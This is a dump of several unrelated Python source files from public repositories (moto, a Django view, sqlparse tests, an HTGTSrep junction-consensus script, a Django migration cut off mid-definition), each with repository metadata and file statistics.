pll/moto
|
e49e67aba5d108b03865bdb42124206ea7e572ea
|
[
"Apache-2.0"
] | null | null | null |
moto/sts/__init__.py
|
pll/moto
|
e49e67aba5d108b03865bdb42124206ea7e572ea
|
[
"Apache-2.0"
] | null | null | null |
moto/sts/__init__.py
|
pll/moto
|
e49e67aba5d108b03865bdb42124206ea7e572ea
|
[
"Apache-2.0"
] | null | null | null |
from .models import sts_backend
from ..core.models import base_decorator
sts_backends = {"global": sts_backend}
mock_sts = base_decorator(sts_backends)
| 25.5
| 40
| 0.810458
| 22
| 153
| 5.318182
| 0.5
| 0.205128
| 0.273504
| 0.410256
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104575
| 153
| 5
| 41
| 30.6
| 0.854015
| 0
| 0
| 0
| 0
| 0
| 0.039216
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
b5ba7ba10498502b304fe0e8be303cfbec8a9050
| 179
|
py
|
Python
|
tapiriik/web/views/dashboard.py
|
prohfesor/tapiriik
|
0c476f8bb6b3d51674f0117b054777405ff2ee0d
|
[
"Apache-2.0"
] | 1,445
|
2015-01-01T21:43:31.000Z
|
2022-03-17T13:40:23.000Z
|
tapiriik/web/views/dashboard.py
|
prohfesor/tapiriik
|
0c476f8bb6b3d51674f0117b054777405ff2ee0d
|
[
"Apache-2.0"
] | 441
|
2015-01-02T03:37:49.000Z
|
2022-03-31T18:18:03.000Z
|
tapiriik/web/views/dashboard.py
|
prohfesor/tapiriik
|
0c476f8bb6b3d51674f0117b054777405ff2ee0d
|
[
"Apache-2.0"
] | 333
|
2015-01-06T12:14:15.000Z
|
2022-03-27T19:58:48.000Z
|
from django.shortcuts import render
from django.views.decorators.csrf import ensure_csrf_cookie
@ensure_csrf_cookie
def dashboard(req):
return render(req, "dashboard.html")
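A hedged sketch of how this view could be wired into a URLconf (the pattern and import path are assumptions, not taken from the repository):
from django.urls import path
from tapiriik.web.views.dashboard import dashboard

urlpatterns = [
    path("dashboard/", dashboard, name="dashboard"),
]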
| 22.375
| 59
| 0.810056
| 25
| 179
| 5.64
| 0.6
| 0.141844
| 0.22695
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.111732
| 179
| 7
| 60
| 25.571429
| 0.886792
| 0
| 0
| 0
| 0
| 0
| 0.078212
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0.4
| 0.2
| 0.8
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
b5bf153601a744508ecc99c7f24b1fb9627883ce
| 150
|
py
|
Python
|
exampleb.py
|
JFletcher94/tBot
|
051281c81b5712f7ecdb4355b7ea7f6551dec7c7
|
[
"MIT"
] | null | null | null |
exampleb.py
|
JFletcher94/tBot
|
051281c81b5712f7ecdb4355b7ea7f6551dec7c7
|
[
"MIT"
] | null | null | null |
exampleb.py
|
JFletcher94/tBot
|
051281c81b5712f7ecdb4355b7ea7f6551dec7c7
|
[
"MIT"
] | null | null | null |
#exampleb generates a full tweet
#examplet only calls get_string()
def get_string():
'''generate full tweet text'''
return 'example #text'
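A one-line usage sketch of the helper above:
print(get_string())  # prints: example #text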
| 18.75
| 34
| 0.7
| 20
| 150
| 5.15
| 0.75
| 0.174757
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.193333
| 150
| 7
| 35
| 21.428571
| 0.85124
| 0.586667
| 0
| 0
| 1
| 0
| 0.236364
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
bd133f9bc78502bb6dd771b9750d4b772d62e105
| 96
|
py
|
Python
|
venv/lib/python3.8/site-packages/jedi/inference/compiled/mixed.py
|
GiulianaPola/select_repeats
|
17a0d053d4f874e42cf654dd142168c2ec8fbd11
|
[
"MIT"
] | 2
|
2022-03-13T01:58:52.000Z
|
2022-03-31T06:07:54.000Z
|
venv/lib/python3.8/site-packages/jedi/inference/compiled/mixed.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | 19
|
2021-11-20T04:09:18.000Z
|
2022-03-23T15:05:55.000Z
|
venv/lib/python3.8/site-packages/jedi/inference/compiled/mixed.py
|
DesmoSearch/Desmobot
|
b70b45df3485351f471080deb5c785c4bc5c4beb
|
[
"MIT"
] | null | null | null |
/home/runner/.cache/pip/pool/d9/2c/a4/7718a956dd946c833114214fec833728fef3062ae858a03a9d82cf9dc7
| 96
| 96
| 0.895833
| 9
| 96
| 9.555556
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.4375
| 0
| 96
| 1
| 96
| 96
| 0.458333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
bd4f4238a7747d65be7c026c2c3ecfe16032b5fb
| 104
|
py
|
Python
|
diofant/printing/pretty/__init__.py
|
project-kotinos/diofant___diofant
|
882549ac3a4dac238695aa620c02fce6ca33f9d3
|
[
"BSD-3-Clause"
] | 1
|
2021-08-22T09:34:15.000Z
|
2021-08-22T09:34:15.000Z
|
diofant/printing/pretty/__init__.py
|
project-kotinos/diofant___diofant
|
882549ac3a4dac238695aa620c02fce6ca33f9d3
|
[
"BSD-3-Clause"
] | null | null | null |
diofant/printing/pretty/__init__.py
|
project-kotinos/diofant___diofant
|
882549ac3a4dac238695aa620c02fce6ca33f9d3
|
[
"BSD-3-Clause"
] | null | null | null |
"""ASCII-ART 2D pretty-printer"""
from .pretty import pprint, pprint_use_unicode, pretty, pretty_print
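A short usage sketch of the re-exported printers (the top-level imports are an assumption, mirroring diofant's sympy-derived API):
from diofant import pprint, symbols

x = symbols('x')
pprint(x**2 + 1, use_unicode=False)  # renders the expression as 2D ASCII art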
| 26
| 68
| 0.778846
| 15
| 104
| 5.2
| 0.733333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010753
| 0.105769
| 104
| 3
| 69
| 34.666667
| 0.827957
| 0.259615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 1
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 1
|
0
| 6
|
1fb4d55d5bca1b790eead271507bcc6a81cff6e7
| 7,289
|
py
|
Python
|
tests/test_api.py
|
brycecaine/sqlpt
|
98b2d72d5f59f92e95a9172dfb0dab92018076f9
|
[
"MIT"
] | null | null | null |
tests/test_api.py
|
brycecaine/sqlpt
|
98b2d72d5f59f92e95a9172dfb0dab92018076f9
|
[
"MIT"
] | 3
|
2021-12-27T21:53:11.000Z
|
2021-12-27T21:53:11.000Z
|
tests/test_api.py
|
brycecaine/sqlpt
|
98b2d72d5f59f92e95a9172dfb0dab92018076f9
|
[
"MIT"
] | null | null | null |
import unittest
import sqlparse
from sqlparse import tokens as T
from sqlparse.sql import (Identifier,
Statement, Token,
TokenList)
from context import (
extract_from_clause, extract_where_clause, tokenize) # , fused)
from context import (
Query, Join, Table, FromClause, WhereClause, Field, Comparison)
class TestApi(unittest.TestCase):
def test_extract(self):
sql = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
whitespace = Token(T.Whitespace, ' ')
table_1 = Table('tbl_stu')
table_2 = Table('tbl_stu_crs')
token_1 = Token(T.Name, 'tbl_stu.id')
token_list_1 = TokenList([token_1])
field_1 = Identifier(token_list_1)
comparison_token = Token(T.Operator, '=')
comparison_list = TokenList([comparison_token])
comparison_1 = Identifier(comparison_list)
token_2 = Token(T.Name, 'tbl_stu_crs.stu_id')
token_list_2 = TokenList([token_2])
field_2 = Identifier(token_list_2)
join_comparison = Comparison(field_1, '=', field_2)
join_1 = Join(table_1, table_2, join_comparison)
joins = [join_1]
from_clause = FromClause(joins)
from_clause_expected = str(from_clause)
from_clause_actual = str(extract_from_clause(sql))
self.assertEqual(from_clause_actual, from_clause_expected)
def test_compare_sql(self):
sql_1 = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
sql_2 = ("select id, "
" name, "
" major "
" from tbl_stu_crs "
" join tbl_stu "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
from_clause_1 = extract_from_clause(sql_1)
from_clause_2 = extract_from_clause(sql_2)
where_clause_1 = extract_where_clause(sql_1)
where_clause_2 = extract_where_clause(sql_2)
self.assertEqual(from_clause_1, from_clause_2)
self.assertEqual(where_clause_1, where_clause_2)
def test_parse(self):
sql = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" join tbl_stu_crs_grd "
" on a = b "
" and c = d "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
sql_tokens = tokenize(sql)
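        # smoke check only: tokenize() should not raise; nothing is asserted here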
# dir(sql_tokens[-1])
# sql_tokens[-1].tokens
class TestQuery(unittest.TestCase):
def test_extract(self):
sql = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
whitespace = Token(T.Whitespace, ' ')
table_1 = Table('tbl_stu')
table_2 = Table('tbl_stu_crs')
token_1 = Token(T.Name, 'tbl_stu.id')
token_list_1 = TokenList([token_1])
field_1 = Identifier(token_list_1)
comparison_token = Token(T.Operator, '=')
comparison_list = TokenList([comparison_token])
comparison_1 = Identifier(comparison_list)
token_2 = Token(T.Name, 'tbl_stu_crs.stu_id')
token_list_2 = TokenList([token_2])
field_2 = Identifier(token_list_2)
join_comparison = Comparison(field_1, '=', field_2)
join_1 = Join(table_1, table_2, join_comparison)
joins = [join_1]
from_clause = FromClause(joins)
from_clause_expected = str(from_clause)
query = Query(sql)
from_clause_actual = str(query.from_clause())
self.assertEqual(from_clause_actual, from_clause_expected)
def test_compare_sql(self):
sql_1 = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
sql_2 = ("select id, "
" name, "
" major "
" from tbl_stu_crs "
" join tbl_stu "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
query_1 = Query(sql_1)
query_2 = Query(sql_2)
from_clause_1 = query_1.from_clause()
from_clause_2 = query_2.from_clause()
where_clause_1 = query_1.where_clause()
where_clause_2 = query_2.where_clause()
self.assertEqual(from_clause_1, from_clause_2)
self.assertEqual(where_clause_1, where_clause_2)
def test_parse(self):
sql = ("select id, "
" name "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" join tbl_stu_crs_grd "
" on a = b "
" and c = d "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
query = Query(sql)
self.assertTrue(query)
# dir(sql_tokens[-1])
# sql_tokens[-1].tokens
def test_fuse(self):
sql_1 = ("select id, "
" name, "
" first_term "
" from tbl_stu "
" join tbl_stu_crs "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2019-Fa' "
" and major = 'MAGC';")
sql_2 = ("select id, "
" name, "
" major "
" from tbl_stu_crs "
" join tbl_stu "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where stu_sem = '2020-Sp' "
" and enrl = 1;")
sql_3 = ("select id, "
" name, "
" first_term, "
" major "
" from tbl_stu_crs "
" join tbl_stu "
" on tbl_stu.id = tbl_stu_crs.stu_id "
" where major = 'MAGC' "
" and enrl = 1 "
" and stu_sem = ':stu_sem';")
query_1 = Query(sql_1)
query_2 = Query(sql_2)
query_3 = Query(sql_3)
# query_4 = fused(query_1, query_2)
# self.assertEqual(query_4, query_3)
parameter_fields = ['stu_sem']
query_1.fuse(query_2).parameterize(parameter_fields)
self.assertEqual(query_1, query_3)
if __name__ == '__main__':
unittest.main()
| 30.755274
| 68
| 0.498697
| 840
| 7,289
| 3.971429
| 0.091667
| 0.097122
| 0.07554
| 0.046763
| 0.739508
| 0.726918
| 0.720923
| 0.720923
| 0.703537
| 0.701139
| 0
| 0.032704
| 0.404308
| 7,289
| 236
| 69
| 30.885593
| 0.735606
| 0.022088
| 0
| 0.786127
| 0
| 0
| 0.261657
| 0
| 0
| 0
| 0
| 0
| 0.046243
| 1
| 0.040462
| false
| 0
| 0.034682
| 0
| 0.086705
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1fc6fa21c4051a53146d8cf76b830b672309eed5
| 12,203
|
py
|
Python
|
HTGTSrep/HTGTSrep/junctionsPerLibs.py
|
Yyx2626/HTGTSrep
|
d8716304b555a7b9161e5f2ce988ebfd17abc9f0
|
[
"MIT"
] | 2
|
2020-05-08T05:12:37.000Z
|
2022-03-28T02:53:03.000Z
|
HTGTSrep/HTGTSrep/junctionsPerLibs.py
|
Yyx2626/HTGTSrep
|
d8716304b555a7b9161e5f2ce988ebfd17abc9f0
|
[
"MIT"
] | 1
|
2020-03-05T04:08:39.000Z
|
2021-08-11T15:02:37.000Z
|
HTGTSrep/HTGTSrep/junctionsPerLibs.py
|
Yyx2626/HTGTSrep
|
d8716304b555a7b9161e5f2ce988ebfd17abc9f0
|
[
"MIT"
] | 4
|
2020-05-30T12:45:48.000Z
|
2022-03-31T12:24:53.000Z
|
'''import sys
import operator
from Bio.Seq import Seq
try:
from Bio.Alphabet import generic_dna, IUPAC
Bio_Alphabet = True
except ImportError:
Bio_Alphabet = None
# usages of generic_dna, IUPAC are not supported in Biopython 1.78 (September 2020).
print(f"The installed BioPython is a new version that has removed the Alphabet module.",file=sys.stderr)
def filter(statFile):
# statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)
ListOfLines = []
labels = statFile.readline()
litems = labels[:-1].split("\t")
ListOfLines.append(litems)
for line in statFile:
items = line[:-1].split("\t")
ListOfLines.append(items)
return ListOfLines
def consensus(lines, CDR3_AA):
consensusLines = []
lines[0].append("CONSENSUS_SEQ")
jidx = lines[0].index("JUNC_DETAIL")
consensusLines.append(lines[0])
for line in lines[1:]:
# h = 1
# cdr = ''
juncDets = line[jidx]
# commented out useless lines JH 06032021
# for item in juncDets.split('|'):
# i1 = item.split(':')[0]
# i2 = int(item.split(':')[1])
# if i2 > h:
# h = i2
# cdr = i1
if CDR3_AA != "T":
consensus = get_consensus(juncDets)
else:
consensus = get_consensus_AA(juncDets)
line.append(consensus)
consensusLines.append(line)
return consensusLines
def get_consensus_AA(allCDR):
pos_base_num = {}
cdr3_len = len(allCDR.split('|')[0].split(':')[0])
for i in range(0, cdr3_len):
pos_base_num[i] = {"A": 0, "R": 0, "N": 0, "D": 0, "C": 0, "Q": 0, "E": 0, "G": 0, "H": 0, "I": 0, "L": 0, "K": 0, "M": 0, "F": 0, "P": 0, "S": 0, "T": 0, "W": 0, "Y": 0, "V": 0}
for seg in allCDR.split('|'):
j = seg.split(':')
for i in range(0, cdr3_len):
pos_base_num[i][j[0][i]] += int(j[1])
consensus = ''
for i in range(0, cdr3_len):
consensus += max(pos_base_num[i].items(), key=operator.itemgetter(1))[0]
return consensus
def get_consensus(allCDR):
pos_base_num = {}
cdr3_len = len(allCDR.split('|')[0].split(':')[0])
for i in range(0, cdr3_len):
pos_base_num[i] = {'A':0, 'T':0, 'C':0, 'G':0, "N":0}
for seg in allCDR.split('|'):
j = seg.split(':')
for i in range(0, cdr3_len):
pos_base_num[i][j[0][i]] += int(j[1])
consensus = ''
for i in range(0, cdr3_len):
consensus += max(pos_base_num[i].items(), key=operator.itemgetter(1))[0]
return consensus
def translate(listLines, CDR3_AA):
dnas = []
listLines[0].append("AA_SEQUENCE")
dnas.append(listLines[0])
conSeq = listLines[0].index("CONSENSUS_SEQ")
# i=0
if CDR3_AA != "T":
for line in listLines[1:]:
seq = line[conSeq]
while len(seq)%3 != 0:
seq += "N"
if Bio_Alphabet:
AA = Seq(seq, generic_dna).translate()
else:
AA = Seq(seq).translate()
# i+=1
line.append(str(AA))
dnas.append(line)
else:
for line in listLines[1:]:
seq = line[conSeq]
AA = seq
# i+=1
line.append(str(AA))
dnas.append(line)
return dnas
def main():
# statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)
clonestat = open(sys.argv[1], "r")
CDR3_AA = sys.argv[2]
toParse = filter(clonestat)
toTranslate = consensus(toParse,CDR3_AA)
translated = translate(toTranslate,CDR3_AA) #already translated allsample.stat file, a list of lines in a file
libsfile = sys.argv[3:] #read in each library's clonestat file to create lib_detail
# # useless lines JH 06032021
# c=0
# libscloneDict = {} ##lib, clone: cdr3seq, num
# cdr3dict = {} ###seq, num : lib, clone
listOfSingleLibraryDicts = []
for library in libsfile:
libstatfile = open(library, "r")
libDict = {} ##append junction details to the library dictionary, for each clone (cdr3seq,V-allele, J-allele): sample, readnum
labels = libstatfile.readline()[:-1].split("\t")
juncIdx = labels.index("JUNC_DETAIL")
vidx = labels.index("V_ALLELE")
jidx = labels.index("J_ALLELE")
sIdx = labels.index("SAMPLE_DETAIL")
for line in libstatfile: #iterate through all the clones in a single library
items = line[:-1].split("\t")
v_allele = items[vidx]
j_allele = items[jidx]
juncDetails = items[juncIdx].split("|")
sample = items[sIdx]
for j in juncDetails:
seqSpecs = j.split(":")
cdr3seq = seqSpecs[0]
readNum = seqSpecs[1]
if (cdr3seq, v_allele, j_allele) not in libDict:
libDict[(cdr3seq, v_allele, j_allele)] = (sample, readNum)
#else:
# print(cdr3seq, readNum)
listOfSingleLibraryDicts.append(libDict)
# print(listOfSingleLibraryDicts)
translated[0].append("LIB_DETAIL") # will contain all lines of master clone file
labels = translated[0] # clonestat.readline()[:-1].split("\t")
idxJD = labels.index("JUNC_DETAIL")
# idxClone = labels.index("CLONE")
idxV = labels.index("V_ALLELE")
idxJ = labels.index("J_ALLELE")
for line in translated[1:2]: #clonestat:
v_allele = line[idxV]
j_allele = line[idxJ]
juncDetails = line[idxJD].split("|")
libDetailString = ''
for j in juncDetails:
seqSpecs = j.split(":")
cdr3seqJ = seqSpecs[0]
# readNum = seqSpecs[1]
tuple2check = (cdr3seqJ, v_allele, j_allele)
print(tuple2check,seqSpecs)
for dict in listOfSingleLibraryDicts:
if tuple2check in dict:
libDetailString += dict[tuple2check][0] + ":" + cdr3seqJ + ":" + dict[tuple2check][1] + "|"
print(libDetailString)
if libDetailString[-1] == "|":
line.append(libDetailString[:-1])
else:
line.append(libDetailString)
for i in translated:
print("\t".join(i))
main()
'''
import sys
import operator
from Bio.Seq import Seq
try:
from Bio.Alphabet import generic_dna, IUPAC
Bio_Alphabet = True
except ImportError:
Bio_Alphabet = None
# usages of generic_dna, IUPAC are not supported in Biopython 1.78 (September 2020).
print(f"The installed BioPython is a new version that has removed the Alphabet module.",file=sys.stderr)
def filter(statFile):
# statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)
ListOfLines = []
labels = statFile.readline()
# updated to .replace so that the last character of the last line will not be accidentally deleted JH 06042021
# litems = labels[:-1].split("\t")
litems = labels.replace("\n", "").split("\t")
ListOfLines.append(litems)
for line in statFile:
# updated to .replace so that the last character of the last line will not be accidentally deleted JH 06042021
# items = line[:-1].split("\t")
items = line.replace("\n", "").split("\t")
ListOfLines.append(items)
return ListOfLines
def consensus(lines):
consensusLines = []
lines[0].append("CONSENSUS_SEQ")
jidx = lines[0].index("JUNC_DETAIL")
consensusLines.append(lines[0])
for line in lines[1:]:
# h = 1
# cdr = ''
juncDets = line[jidx]
# commented out useless lines JH 06032021
# for item in juncDets.split('|'):
# i1 = item.split(':')[0]
# i2 = int(item.split(':')[1])
# if i2 > h:
# h = i2
# cdr = i1
consensus = get_consensus(juncDets)
line.append(consensus)
consensusLines.append(line)
return consensusLines
def get_consensus(allCDR):
pos_base_num = {}
cdr3_len = len(allCDR.split('|')[0].split(':')[0])
for i in range(0, cdr3_len):
pos_base_num[i] = {'A':0, 'T':0, 'C':0, 'G':0, "N":0}
for seg in allCDR.split('|'):
j = seg.split(':')
for i in range(0, cdr3_len):
pos_base_num[i][j[0][i]] += int(j[1])
consensus = ''
for i in range(0, cdr3_len):
consensus += max(pos_base_num[i].items(), key=operator.itemgetter(1))[0]
return consensus
def translate(listLines):
dnas = []
listLines[0].append("AA_SEQUENCE")
dnas.append(listLines[0])
conSeq = listLines[0].index("CONSENSUS_SEQ")
# i=0
for line in listLines[1:]:
seq = line[conSeq]
while len(seq) % 3 != 0:
seq += "N"
if Bio_Alphabet:
AA = Seq(seq, generic_dna).translate()
else:
AA = Seq(seq).translate()
# i+=1
line.append(str(AA))
dnas.append(line)
return dnas
def main():
# NOTE statfile = '%s/allsample_clonal/allsample.mix_clone.stat.xls' % (args.outdir)
clonestat = open(sys.argv[1], "r")
toParse = filter(clonestat)
toTranslate = consensus(toParse)
translated = translate(toTranslate) #already translated allsample.stat file, a list of lines in a file
libsfile = sys.argv[2:] # read in each library's clonestat file to create lib_detail
# # useless lines JH 06032021
# c=0
# libscloneDict = {} ##lib, clone: cdr3seq, num
# cdr3dict = {} ###seq, num : lib, clone
listOfSingleLibraryDicts = []
for library in libsfile:
libstatfile = open(library, "r")
libDict = {} ##append junction details to the library dictionary, for each clone (cdr3seq,V-allele, J-allele): sample, readnum
# updated to .replace so that the last character of the last line will not be accidentally deleted JH 06042021
# labels = libstatfile.readline()[:-1].split("\t")
labels = libstatfile.readline().replace("\n", "").split("\t")
juncIdx = labels.index("JUNC_DETAIL")
vidx = labels.index("V_ALLELE")
jidx = labels.index("J_ALLELE")
sIdx = labels.index("SAMPLE_DETAIL")
for line in libstatfile: #iterate through all the clones in a single library
# updated to .replace so that the last character of the last line will not be accidentally deleted JH 06042021
# items = line[:-1].split("\t")
items = line.replace("\n", "").split("\t")
v_allele = items[vidx]
j_allele = items[jidx]
juncDetails = items[juncIdx].split("|")
sample = items[sIdx]
for j in juncDetails:
seqSpecs = j.split(":")
cdr3seq = seqSpecs[0]
readNum = seqSpecs[1]
if (cdr3seq, v_allele, j_allele) not in libDict:
libDict[(cdr3seq, v_allele, j_allele)] = (sample, readNum)
#else:
# print(cdr3seq, readNum)
listOfSingleLibraryDicts.append(libDict)
# print(listOfSingleLibraryDicts)
translated[0].append("LIB_DETAIL") # will contain all lines of master clone file
labels = translated[0] # clonestat.readline()[:-1].split("\t")
idxJD = labels.index("JUNC_DETAIL")
# idxClone = labels.index("CLONE")
idxV = labels.index("V_ALLELE")
idxJ = labels.index("J_ALLELE")
for line in translated[1:]: #clonestat:
v_allele = line[idxV]
j_allele = line[idxJ]
juncDetails = line[idxJD].split("|")
libDetailString = ''
for j in juncDetails:
seqSpecs = j.split(":")
cdr3seqJ = seqSpecs[0]
# readNum = seqSpecs[1]
tuple2check = (cdr3seqJ, v_allele, j_allele)
for dict in listOfSingleLibraryDicts:
if tuple2check in dict:
libDetailString += dict[tuple2check][0] + ":" + cdr3seqJ + ":" + dict[tuple2check][1] + "|"
        # guard against an empty string: no library may match this clone's junctions
        if libDetailString and libDetailString[-1] == "|":
            line.append(libDetailString[:-1])
        else:
            line.append(libDetailString)
for i in translated:
print("\t".join(i))
if __name__ == '__main__':
    main()
| 35.891176
| 186
| 0.578137
| 1,509
| 12,203
| 4.597747
| 0.121272
| 0.016143
| 0.017296
| 0.014269
| 0.951427
| 0.943932
| 0.920294
| 0.920294
| 0.915682
| 0.902421
| 0
| 0.030324
| 0.283865
| 12,203
| 339
| 187
| 35.99705
| 0.763589
| 0.650414
| 0
| 0.1
| 0
| 0
| 0.057028
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.045455
| 0
| 0.127273
| 0.018182
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
1f406fa1d479f75e59d5f05a3c4ac549424cb9b7
| 214
|
py
|
Python
|
filer/models/__init__.py
|
pbs/django-filer
|
c862a84d4e1d86c14eeb509e341f6a7d39a421bf
|
[
"BSD-3-Clause"
] | 1
|
2015-03-03T15:49:14.000Z
|
2015-03-03T15:49:14.000Z
|
filer/models/__init__.py
|
pbs/django-filer
|
c862a84d4e1d86c14eeb509e341f6a7d39a421bf
|
[
"BSD-3-Clause"
] | 10
|
2015-04-08T14:16:52.000Z
|
2021-12-15T16:17:57.000Z
|
filer/models/__init__.py
|
pbs/django-filer
|
c862a84d4e1d86c14eeb509e341f6a7d39a421bf
|
[
"BSD-3-Clause"
] | null | null | null |
#-*- coding: utf-8 -*-
from .mixins import *
from .filemodels import *
from .clipboardmodels import *
from .imagemodels import *
from .foldermodels import *
from .virtualitems import *
from .archivemodels import *
| 23.777778
| 30
| 0.742991
| 24
| 214
| 6.625
| 0.5
| 0.377358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005495
| 0.149533
| 214
| 8
| 31
| 26.75
| 0.868132
| 0.098131
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
1f5755adc834fa964d8b57abac91fbc6499d9935
| 4,608
|
py
|
Python
|
menucard/migrations/0001_initial.py
|
baniasbaabe/happy-qr
|
bf44ac19306ea6405cc7c9a100e6f83afca125b4
|
[
"MIT"
] | 1
|
2021-01-23T21:42:10.000Z
|
2021-01-23T21:42:10.000Z
|
menucard/migrations/0001_initial.py
|
baniasbaabe/happy-qr
|
bf44ac19306ea6405cc7c9a100e6f83afca125b4
|
[
"MIT"
] | null | null | null |
menucard/migrations/0001_initial.py
|
baniasbaabe/happy-qr
|
bf44ac19306ea6405cc7c9a100e6f83afca125b4
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.2 on 2020-12-27 10:36
from django.db import migrations, models
import django.db.models.deletion
import phonenumber_field.modelfields
class Migration(migrations.Migration):
initial = True
dependencies = [
('crm', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Vorspeise',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=55)),
('beschreibung', models.TextField(blank=True, default='')),
('preis', models.FloatField()),
('kundeId', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='crm.kunde')),
],
),
migrations.CreateModel(
name='Snacks',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=55)),
('beschreibung', models.TextField(blank=True, default='')),
('preis', models.FloatField()),
('kundeId', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='crm.kunde')),
],
),
migrations.CreateModel(
name='Nachspeise',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=55)),
('beschreibung', models.TextField(blank=True, default='')),
('preis', models.FloatField()),
('kundeId', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='crm.kunde')),
],
),
migrations.CreateModel(
name='Hauptspeise',
fields=[
